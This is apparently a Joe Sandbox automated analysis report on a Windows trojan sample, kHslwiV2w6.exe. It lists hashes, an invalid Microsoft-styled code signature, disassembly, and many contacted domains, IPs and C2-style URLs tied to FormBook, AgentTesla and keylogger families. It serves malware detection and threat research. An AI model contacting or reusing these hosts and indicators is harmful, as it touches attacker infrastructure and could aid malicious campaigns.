                                                                                                                                                                                                                                                              http://www.hecxion.xyz/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                http://ocsp.sectigo.com0kHslwiV2w6.exefalse
                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                  http://www.woby.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                    https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-seeexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                      http://www.vizamag.comReferer:explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                        http://www.rakring.com/md02/www.rslotrank.winexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                          https://api.msn.com/Uexplorer.exe, 00000004.00000002.11886221151.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8623739115.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.00000000094DB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                            https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voiexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                              http://www.piedge-taiko.net/md02/explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                		unknown

                                                                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                104.18.188.223
                                                                                                                                                                                                                                                                                		ssl1.prod.systemdragon.comUnited States
                                                                                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                198.185.159.144
                                                                                                                                                                                                                                                                                		ext-sq.squarespace.comUnited States
                                                                                                                                                                                                                                                                                		53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                                172.67.143.211
                                                                                                                                                                                                                                                                                		www.tigajco69.funUnited States
                                                                                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                172.66.0.70
                                                                                                                                                                                                                                                                                		andrewghita.comUnited States
                                                                                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                52.206.163.162
                                                                                                                                                                                                                                                                                		proxy-ssl-geo.webflow.comUnited States
                                                                                                                                                                                                                                                                                		14618AMAZON-AESUStrue

                                                                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                Analysis ID:1529053
                                                                                                                                                                                                                                                                                Start date and time:2024-10-08 15:59:21 +02:00
                                                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                Overall analysis duration:0h 17m 49s
                                                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                                                                                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                                                Sample name:kHslwiV2w6.exe
                                                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@385/0@23/5
                                                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                                                • Successful, ratio: 70%
                                                                                                                                                                                                                                                                                • Number of executed functions: 64
                                                                                                                                                                                                                                                                                • Number of non-executed functions: 260
                                                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                • VT rate limit hit for: kHslwiV2w6.exe

                                                                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                                                10:02:17API Interceptor15112266x Sleep call for process: raserver.exe modified
                                                                                                                                                                                                                                                                                10:02:25API Interceptor18365249x Sleep call for process: explorer.exe modified

                                                                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                104.18.188.223order-payment094093.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                • www.businessjp6-51399.info/hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA==
                                                                                                                                                                                                                                                                                198.185.159.1445h48M0mr7p.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.pizzeriadonluca.com/tqug/?t8eH=Bd68RFqHJL7&BZ=Tm91fa44ftZCPMS4MR2eIRgBICbXKooMeZ+9PNwMGgavbZaFtNpIYa/u14epU4tdNV9dH3afqQ==
                                                                                                                                                                                                                                                                                rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.wearelemonpepper.com/e72r/
                                                                                                                                                                                                                                                                                4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.wearelemonpepper.com/e72r/
                                                                                                                                                                                                                                                                                firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144/
                                                                                                                                                                                                                                                                                firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144/
                                                                                                                                                                                                                                                                                firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144/
                                                                                                                                                                                                                                                                                LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.consultoriamax.net/rn94/?D8v=8pGtVJo0up&Rfg=2JuEGy1AzmLWlmggvy20ihD+4b+i/qJT0Rq51f6xG6YauqLT7h1HcItJQqrNe+TJOdi5
                                                                                                                                                                                                                                                                                Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.trenchonbirmingham.com/pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve
                                                                                                                                                                                                                                                                                DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.wearelemonpepper.com/e72r/
                                                                                                                                                                                                                                                                                Official Salary for the Month of August 2024 - NU1622662404290592.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.trenchonbirmingham.com/pt46/?Cj90E=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve&GVWh=CdT0vvb
                                                                                                                                                                                                                                                                                52.206.163.162SKM_TR0020102023_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • www.getconsol.com/g11y/?DXIDO=zV+AjaIknu0nyITedyv88oZsA+21f869+9+9v+sataYbziG/sKwtZ2V3W9q9ogEF1jb3&tzrh=jlNdnlthmFpxsX

                                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                parkingpage.namecheap.comPURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                http://buddycities.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                http://buckboosters.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                http://vpnpanda.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                nBjauMrrmC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                0001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 91.195.240.19
                                                                                                                                                                                                                                                                                proxy-ssl-geo.webflow.comhttp://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 18.102.16.191
                                                                                                                                                                                                                                                                                http://www.token-webpanel.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 35.152.104.113
                                                                                                                                                                                                                                                                                https://www.cyderes.com/e3t/Ctc/ON+113/cpWbt04/VX4GLN83B5sSVcgNxQ2Ps5TgVfQRxk5l9kHPN48YK9C5m_5PW50kH_H6lZ3pVW8y4rsC3Frq3xW6yS46B81vNwBW7nKjzX7rlDGLW8Pgnsm2TMWP7W8BGJ3S7v4twJW4Frjvh65WTfKVTz5h-5gQP1gMVRZvWxc0gFW70YCkf5Yr5gxW4_ym5p4kM2HWW8XQLRs2fQKTSW6H8zL35wntpYW2g-lt23Pgmr-W5tJKtK3hc6rbW6CjtL61FP38FN8Dg60fYghyWW9bC6JC3rZqmzW8VJhP664ltDxW1lwcb13ZpPGyW5K_1JQ3TqNPdW95WCPZ4QLNngW273xc864PDv3W5x93bB7dRNxTW92-5jF1RVBWpW8x57FF7P2xcjW7KK8Xj8n_ZZMW7CgpVb566CBBW8bVlWQ11xhLlVs3yDJ8NdTRzW12g9Fn559wR0W9bq01776CWknW5nG39p82bgTcf5RLlBK04Get hashmaliciousFollina CVE-2022-30190Browse
                                                                                                                                                                                                                                                                                • 63.35.51.142
                                                                                                                                                                                                                                                                                https://www.champstpo.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 35.152.119.144
                                                                                                                                                                                                                                                                                http://fswcf.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 63.35.51.142
                                                                                                                                                                                                                                                                                http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 34.249.200.254
                                                                                                                                                                                                                                                                                https://so-coinbas-extsion.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 52.17.119.105
                                                                                                                                                                                                                                                                                https://viture.com/windowsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 63.35.51.142
                                                                                                                                                                                                                                                                                SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 63.35.51.142
                                                                                                                                                                                                                                                                                Trialog_Drives_Mapping.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 52.17.119.105
                                                                                                                                                                                                                                                                                www.qqkartel88v1.comNovi upit #876567-AWB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                                                Narud#U017ebenica 08BIH2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3

                                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                CLOUDFLARENETUSCXWCXZOzGM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                                                Dovidka.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 104.16.231.132
                                                                                                                                                                                                                                                                                eGBOY15aNx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                NIJIMUN6pQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                                                                5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 104.21.24.234
                                                                                                                                                                                                                                                                                ItPTgiBC07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                                                                GrsefI1q4s.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                                                Scan08.10.24(Massimiliano.benso)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 104.18.11.207
                                                                                                                                                                                                                                                                                V6SBOrgGcr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                rliquida____odefaturadepagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                SQUARESPACEUShttp://kendellseafoods.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144
                                                                                                                                                                                                                                                                                http://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/bca13/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.49.23.145
                                                                                                                                                                                                                                                                                http://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/d7f1d/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.145
                                                                                                                                                                                                                                                                                https://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/500b0/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.145
                                                                                                                                                                                                                                                                                https://33357.github.io/uniswap-v2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.49.23.145
                                                                                                                                                                                                                                                                                https://dapp-cuteid.cvnlab.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.49.23.145
                                                                                                                                                                                                                                                                                https://seedsmarket.org/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.177
                                                                                                                                                                                                                                                                                https://www.boutique-insights.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.144
                                                                                                                                                                                                                                                                                FICHIER4!!.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.177
                                                                                                                                                                                                                                                                                https://pub.marq.com/9d8816-7c5c-4412-bdd0-b960bf225/#_0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 198.185.159.177
                                                                                                                                                                                                                                                                                CLOUDFLARENETUSCXWCXZOzGM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                                                Dovidka.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                • 104.16.231.132
                                                                                                                                                                                                                                                                                eGBOY15aNx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                NIJIMUN6pQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                                                                5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                • 104.21.24.234
                                                                                                                                                                                                                                                                                ItPTgiBC07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                • 172.67.74.152
                                                                                                                                                                                                                                                                                GrsefI1q4s.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                                                Scan08.10.24(Massimiliano.benso)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                • 104.18.11.207
                                                                                                                                                                                                                                                                                V6SBOrgGcr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                                                                                                rliquida____odefaturadepagamento.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                • 188.114.96.3

                                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                No created / dropped files found

                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                Entropy (8bit):7.067796423389837
                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                                                                                                • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                                                                                File name:kHslwiV2w6.exe
                                                                                                                                                                                                                                                                                File size:1'627'744 bytes
                                                                                                                                                                                                                                                                                MD5:3364dc2488f8444000a9da4c6d999fc4
                                                                                                                                                                                                                                                                                SHA1:19cf9bd0f6976d75f7738ec74d2b326edee5bdde
                                                                                                                                                                                                                                                                                SHA256:fcf632af143e88dfba5e9256d0fb238eb314b0d20e63141cb659ed7ad001cbb4
                                                                                                                                                                                                                                                                                SHA512:24778076f2e3fbd0ab39675bab98bd7da9feaa08e276d720da2fca252377ceb2c7b1da1b9c3b862e2acbea9b6e0c29e77e093c9cff366055d894a969545ea921
                                                                                                                                                                                                                                                                                SSDEEP:49152:AAodtaG9kS2U84B+FLan9k5TRM9zlcVj7vdLJ7t:A/B18P7t
                                                                                                                                                                                                                                                                                TLSH:7C75CF19E3A811FCD527C674CB55A233E6B170560B21A4CB1B99C7452FB3EE26B7B302
                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............

                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                Entrypoint:0x14006ac2c
                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                Time Stamp:0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                Import Hash:22a65106d3d84ea74d966fa0424a5a0c

                                                                                                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                                                                Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                                                                • 17/09/2024 12:22:40 17/09/2025 12:22:40
                                                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                                                • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                                                                Thumbprint MD5:F377CA390FA4FC298436022336FD1B10
                                                                                                                                                                                                                                                                                Thumbprint SHA-1:E82434363EAD01AD4A46E44521DF4A39C3DDF5F9
                                                                                                                                                                                                                                                                                Thumbprint SHA-256:11E14F15FBDE946D88B6FFC159BD10F8806ECC7BD2769F260436DD6CB51A2A4A
                                                                                                                                                                                                                                                                                Serial:101013DA8DDB93A6F41083213D4E782B

                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                                                call 00007FD30D7171ACh
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                                                jmp 00007FD30D7169D7h
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                jmp 00007FD30D717528h
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                                                call 00007FD30D717524h
                                                                                                                                                                                                                                                                                jmp 00007FD30D716B64h
                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                jmp 00007FD30D716B4Ch
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                                                                mov eax, dword ptr [ecx+38h]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                mov ecx, edx
                                                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                                                                                                call 00007FD30D716B72h
                                                                                                                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                inc ebp
                                                                                                                                                                                                                                                                                mov ebx, dword ptr [eax]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                mov ebx, edx
                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                and ebx, FFFFFFF8h
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                test byte ptr [eax], 00000004h
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                mov edx, ecx
                                                                                                                                                                                                                                                                                je 00007FD30D716B75h
